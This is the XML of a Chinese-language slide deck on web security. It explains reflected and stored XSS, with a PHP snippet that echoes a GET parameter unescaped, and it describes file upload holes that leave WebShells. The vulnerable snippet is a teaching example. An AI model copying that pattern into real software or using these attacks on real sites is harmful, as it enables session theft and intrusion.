      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30613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500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="14" presetID="49" presetClass="entr" presetSubtype="0" decel="10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style.rotation</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="360"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="20" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="21" presetID="49" presetClass="entr" presetSubtype="0" decel="10000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 calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.rotation</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="360"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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519981"/>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页面将传入的参数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未经过有效性检验而直接写入到响应结果中，所以这个页面容易受到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
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFE7A96A-D616-4A2E-8276-A1A8B22BAA17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2108894" y="1723499"/>
            <a:ext cx="9649073" cy="3785652"/>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&lt;?php</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if(!</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array_key_exists</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("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] ==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isempty</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true;</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else {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'Hello ' . $_GET['name'];</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echo '&lt;/pre&gt;';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}?&gt; </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE9E4A47-868E-4C46-9DD7-BCE43BC5F516}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3333031" y="5362623"/>
            <a:ext cx="6660226" cy="1350046"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="69010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928713"/>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如果攻击者输入如下脚本</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。如下图可以看出，传入的脚本在客户端服务器中得以执行。这个警告框证明此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应用程序存在可被反射式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攻击的漏洞。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 152">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AC691BA-9782-4C00-91C9-9929D13795D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1244799" y="2055402"/>
            <a:ext cx="10723415" cy="1560923"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 153">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43BA80C2-C6EE-45EA-A032-7A2543EA1069}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1892871" y="3787031"/>
            <a:ext cx="9590378" cy="2516906"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="407603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C12DD192-06AC-4414-9D05-90D29408EA06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1316807" y="730597"/>
            <a:ext cx="10635728" cy="3970318"/>
            <a:chOff x="4933525" y="1205763"/>
            <a:chExt cx="9978247" cy="3970318"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="六边形 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAE0F81A-D1B6-4068-926C-607E29CA0426}"/>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rPr>
                <a:t>存储式</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>XSS</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="16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62B62025-39FF-4F56-960C-CEA2860600BE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6955734" y="1205763"/>
              <a:ext cx="79560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pP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存储式跨站脚本又称为持久型跨站脚本，比反射式跨站脚本更具有威胁性，并且可能影响到</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服务器自身的安全。</a:t>
              </a:r>
              <a:endPar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与反射式</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rgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>类似</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的地方在于，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会在</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应用程序的网页中显示未经编码的攻击者脚本</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它们的</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>区别</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在于，</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存储式</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XSS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中的脚本并非来自于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应用程序请求；相反，脚本是由</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应用程序进行存储的，并且会将其其作为内容显示给浏览用户。</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="12" name="直接连接符 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B55A172D-EC37-430F-A1C9-BE3684B9DB99}"/>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矩形: 圆角 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{285B26E0-4823-409B-A63B-C2598E4FC3FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1964879" y="5200502"/>
            <a:ext cx="8928992" cy="130432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例如，如果论坛或博客网站允许用户上传内容而不进行适当的有效性检查或编码，那么这个网站就容易受到存储式</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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="288597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791744"/>
            <a:ext cx="10657185" cy="955983"/>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在这个示例中，我们向该留言板提交攻击脚本，该脚本会存储在其后台数据库服务器，每当用户查看留言板时，则会弹出对话框：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 154">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2478428A-0887-4FC0-A338-1B425051E4CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2942753" y="1968029"/>
            <a:ext cx="6973243" cy="1648296"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 155">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D8924D6-67B8-419A-B479-5D68D97B684A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3333031" y="3815719"/>
            <a:ext cx="6048672" cy="2850546"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26643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290282" y="837929"/>
              <a:ext cx="2278188"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的攻击途径</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79380" y="1672109"/>
            <a:ext cx="10099988" cy="1938992"/>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上面演示的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攻击只是显示一个警告框，但是在现实的攻击案例中，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攻击者有可能进行更具破坏性的攻击。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恶意脚本可以将</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值上传到攻击者的网站，从而有可能让攻击者以该用户的身份登入或恢复正在进行中的会话。</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脚本还可以改写页面内容，使其看上去已经被</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涂鸦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5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId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00743"/>
            <a:ext cx="5019675" cy="2857500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="209899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13713" y="837929"/>
              <a:ext cx="203132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文件上传漏洞</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="矩形: 圆角 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47450B5E-6CC0-4199-881F-949BEF72E82D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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指网络攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马，病毒，恶意脚本或者</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这种攻击方式是最为直接和有效的，部分文件上传漏洞的利用技术门槛非常的低，对于攻击者来说很容易实施。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="组合 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59329509-2735-4B6D-90B3-0A680DDB9144}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1604839" y="3090372"/>
            <a:ext cx="2733577" cy="2398161"/>
            <a:chOff x="1241134" y="3090372"/>
            <a:chExt cx="2733577" cy="2398161"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64" name="íṡľíḍè-Rectangle 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6631384-B0F7-4805-BD3B-91B1FDD1DB43}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2408DEFF-8CF6-43F6-8A5D-B93617178430}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1385633" y="3228949"/>
              <a:ext cx="2519950" cy="1894582"/>
              <a:chOff x="1385633" y="3228949"/>
              <a:chExt cx="2519950" cy="1894582"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="66" name="文本框 65">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2B15A79-337F-4D6D-929D-9DD67B264633}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1385633" y="3923202"/>
                <a:ext cx="2519950"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a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>文件上传漏洞本身就是一个危害巨大的漏洞，</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更是</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                    <a:solidFill>
                      <a:prstClr val="white"/>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                    <a:ea typeface="微软雅黑"/>
                    <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>将这种漏洞的利用无限扩大。</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="27" name="warning_94911">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A21AA87-83AD-4D46-A923-119EB38D0B89}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2327862" y="3228949"/>
                <a:ext cx="536888" cy="581382"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 5754 w 5783"/>
                  <a:gd name="T1" fmla="*/ 1517 h 6271"/>
                  <a:gd name="T2" fmla="*/ 5629 w 5783"/>
                  <a:gd name="T3" fmla="*/ 1445 h 6271"/>
                  <a:gd name="T4" fmla="*/ 4329 w 5783"/>
                  <a:gd name="T5" fmla="*/ 749 h 6271"/>
                  <a:gd name="T6" fmla="*/ 2878 w 5783"/>
                  <a:gd name="T7" fmla="*/ 0 h 6271"/>
                  <a:gd name="T8" fmla="*/ 1274 w 5783"/>
                  <a:gd name="T9" fmla="*/ 818 h 6271"/>
                  <a:gd name="T10" fmla="*/ 127 w 5783"/>
                  <a:gd name="T11" fmla="*/ 1445 h 6271"/>
                  <a:gd name="T12" fmla="*/ 21 w 5783"/>
                  <a:gd name="T13" fmla="*/ 1509 h 6271"/>
                  <a:gd name="T14" fmla="*/ 0 w 5783"/>
                  <a:gd name="T15" fmla="*/ 1612 h 6271"/>
                  <a:gd name="T16" fmla="*/ 2878 w 5783"/>
                  <a:gd name="T17" fmla="*/ 6271 h 6271"/>
                  <a:gd name="T18" fmla="*/ 5783 w 5783"/>
                  <a:gd name="T19" fmla="*/ 1650 h 6271"/>
                  <a:gd name="T20" fmla="*/ 5754 w 5783"/>
                  <a:gd name="T21" fmla="*/ 1517 h 6271"/>
                  <a:gd name="T22" fmla="*/ 3266 w 5783"/>
                  <a:gd name="T23" fmla="*/ 1307 h 6271"/>
                  <a:gd name="T24" fmla="*/ 3190 w 5783"/>
                  <a:gd name="T25" fmla="*/ 3911 h 6271"/>
                  <a:gd name="T26" fmla="*/ 2593 w 5783"/>
                  <a:gd name="T27" fmla="*/ 3911 h 6271"/>
                  <a:gd name="T28" fmla="*/ 2593 w 5783"/>
                  <a:gd name="T29" fmla="*/ 3898 h 6271"/>
                  <a:gd name="T30" fmla="*/ 2517 w 5783"/>
                  <a:gd name="T31" fmla="*/ 1307 h 6271"/>
                  <a:gd name="T32" fmla="*/ 3266 w 5783"/>
                  <a:gd name="T33" fmla="*/ 1307 h 6271"/>
                  <a:gd name="T34" fmla="*/ 2891 w 5783"/>
                  <a:gd name="T35" fmla="*/ 5094 h 6271"/>
                  <a:gd name="T36" fmla="*/ 2468 w 5783"/>
                  <a:gd name="T37" fmla="*/ 4656 h 6271"/>
                  <a:gd name="T38" fmla="*/ 2891 w 5783"/>
                  <a:gd name="T39" fmla="*/ 4218 h 6271"/>
                  <a:gd name="T40" fmla="*/ 3315 w 5783"/>
                  <a:gd name="T41" fmla="*/ 4656 h 6271"/>
                  <a:gd name="T42" fmla="*/ 2891 w 5783"/>
                  <a:gd name="T43" fmla="*/ 5094 h 6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83" h="6271">
                    <a:moveTo>
                      <a:pt x="5754" y="1517"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5728" y="1470"/>
                      <a:pt x="5683" y="1445"/>
                      <a:pt x="5629" y="1445"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5394" y="1445"/>
                      <a:pt x="4853" y="1091"/>
                      <a:pt x="4329" y="749"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3738" y="364"/>
                      <a:pt x="3181" y="0"/>
                      <a:pt x="2878" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2559" y="0"/>
                      <a:pt x="1906" y="416"/>
                      <a:pt x="1274" y="818"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="790" y="1126"/>
                      <a:pt x="290" y="1445"/>
                      <a:pt x="127" y="1445"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="1445"/>
                      <a:pt x="43" y="1468"/>
                      <a:pt x="21" y="1509"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="1536"/>
                      <a:pt x="0" y="1570"/>
                      <a:pt x="0" y="1612"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="2217"/>
                      <a:pt x="1913" y="6271"/>
                      <a:pt x="2878" y="6271"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3789" y="6271"/>
                      <a:pt x="5783" y="2392"/>
                      <a:pt x="5783" y="1650"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5783" y="1594"/>
                      <a:pt x="5774" y="1551"/>
                      <a:pt x="5754" y="1517"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="3266" y="1307"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3190" y="3911"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2593" y="3911"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2593" y="3898"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2517" y="1307"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3266" y="1307"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="2891" y="5094"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2650" y="5094"/>
                      <a:pt x="2468" y="4906"/>
                      <a:pt x="2468" y="4656"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2468" y="4406"/>
                      <a:pt x="2650" y="4218"/>
                      <a:pt x="2891" y="4218"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3141" y="4218"/>
                      <a:pt x="3315" y="4398"/>
                      <a:pt x="3315" y="4656"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3315" y="4910"/>
                      <a:pt x="3137" y="5094"/>
                      <a:pt x="2891" y="5094"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>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dirty="0">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="组合 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54100FB4-C144-438F-BD76-EAFE261D8EAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5062586" y="3090372"/>
            <a:ext cx="2733577" cy="2398161"/>
            <a:chOff x="5062586" y="3090372"/>
            <a:chExt cx="2733577" cy="2398161"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="85" name="íṡľíḍè-Rectangle 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{123A49EE-A712-4108-8829-C09CFEE7162A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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6" name="文本框 85">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F5E84CD-3160-468A-8693-302B1951E0A0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5202512" y="3921525"/>
              <a:ext cx="2593651" cy="120032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prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>大多数的上传漏洞被利用后攻击者都会留下</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>WebShell</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>以方便后续进入系统。</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="caution-sign_101">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34C49AA2-CDCA-4188-BB37-8105AD01BCEA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6124533" y="3283371"/>
              <a:ext cx="609685" cy="526960"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
